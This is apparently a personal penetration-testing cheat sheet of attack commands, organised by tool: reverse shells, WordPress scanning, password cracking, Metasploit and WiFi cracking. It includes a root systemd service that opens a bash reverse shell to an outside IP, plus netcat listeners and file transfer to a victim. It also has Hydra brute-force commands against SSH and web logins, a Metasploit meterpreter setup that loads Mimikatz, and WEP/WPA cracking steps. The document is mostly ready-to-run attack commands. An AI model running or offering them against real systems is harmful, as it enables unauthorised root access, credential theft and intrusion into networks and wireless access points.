Attack Tools
Reverse Shell
Netcat
Installsudo apt install ncat
Start netcat listening on e.g. port 1234: nc -lvnp 1234
Once payload is triggered netcat will open a reverse shell:
Create service
Create 0xfab1.service in /temp/
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.9.193.173/9999 0>&1'
[Install]
WantedBy=multi-user.target
- move file to /temp/ of www-data from attacker box: -on victim:
nc -vl 44444 > fab.service
- on attacker:
nc -n TargetIP 44444 < fab.service
- on attacker now start a new netcat session on 9999:
nc -lvnp 9999
Now use systemctl on victim machine and we should be root from the attacker box:
/bin/systemctl enable /tmp/fab.service
/bin/systemctl start fab
Web
Wordpress
WPScan is a WordPress security scanner to test the security of their WordPress websites.
Example
wpscan --url http://example.org/wordpress -e u
wpscan --url http://example.org/wordpress --usernames admin --passwords wordlist.txt --threads 10
Passwords
- Crunch: create custom wordlists
John the ripper
John the Ripper is a tool for offline password cracking. If you prefer a GUI there is one available here.
Crack keyfile PW
gzip -d /usr/share/wordlists/rockyou.txt.gz
/usr/share/john/ssh2john.py ssh-key-kay.txt > forjohn.txt
john forjohn.txt --wordlist /usr/share/wordlists/rockyou.txt
Convert a JWT to a format John the Ripper can understand with jwt2john:
wget --quiet -O /usr/local/bin/jwt2john.py "https://raw.githubusercontent.com/Sjord/jwtcrack/master/jwt2john.py"
sed -i '1s;^;#!/usr/bin/env python\n;' /usr/local/bin/jwt2john.py
chmod +x /usr/local/bin/jwt2john.py
Crack a password protected zip file:
zip2john filename.zip > filename.hash
john filename.hash --wordlist=wordlist.txt --verbosity=5
Hydra
SSH PW Brute Force user "user"
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://10.10.112.131
Web Form Brute Force:
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.10.233.243 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Metasploit
Config
Start PostgreSQL und Metasploit on boot
update-rc.d postgresql enable
update-rc.d metasploit enable
Manuall start
service postgresql start
service metasploit start
Start msfconsole
Init Metaspoit and start the console
msfdb init
msfconsole -h
msfconsole
db_status
Add Target
db_nmap -sV 10.10.201.217
Scan Target
hosts
services
vulns
Use Exploit
This is an example using an exploit with Metasploit:
search multi/handler
use # exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.9.193.173
set RHOSTS 10.10.201.217
use icecast
run -j
sessions
sessions -i 1
Check Machine
getprivs
sysinfo
getuid
Start Mimikatz
load kiwi
Try different exploits
run post/windows/gather/checkvm
run post/multi/recon/local_exploit_suggester
run post/windows/manage/enable_rdp
run autoroute -s 10.10.201.217 -n 255.255.255.0
WiFi
Aircrack-NG suite
Send Kismet dump
aircrack-ng -b 00:1E:58:B4:24:F4 /root/Kismet.dump
Preparing The WIFI Card for Airodump
modprobe -r iwl3945
modprobe ipwraw
airmon-ng start [device]
airodump-ng [device]
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
WiFite2
wifite2 is a tool to audit WEP or WPA encrypted wireless networks. It uses aircrack-ng, pyrit, reaver, tshark tools to perform the audit.
Examples:
- Cracking WPS PIN (Pixie-Dust with Reaver to get PIN and Bully to get PSK):
wifite -e ESSID
- Cracking WPA key using PMKID attack:
wifite -e ESSID --pmkid
- Decloaking & cracking a hidden access point on channel 10 using the WPA Handshake attack:
wifite -c 10
- Cracking a weak WEP password using the WEP Replay attack:
wifite --wep
- Cracking a pre-captured handshake using John The Ripper:
wifite --crack
- Cracking a 5Ghz WiFi (skipping WPS, PMKID to save time) using a given dictionary:
sudo wifite --kill --no-wps --no-pmkid --5ghz --dict wordlist.txt
Kismet
Config Kismet
- Config this file
/usr/local/etc/kismet.conf
- And add a sourece e.g.
source=ipw2200,eth1,Intel
Commands
- ss (type)
- L (choose WIFI+Channel)
- i (Info → copy BSSID)
Fluxion
Clone of the target Wi-Fi network.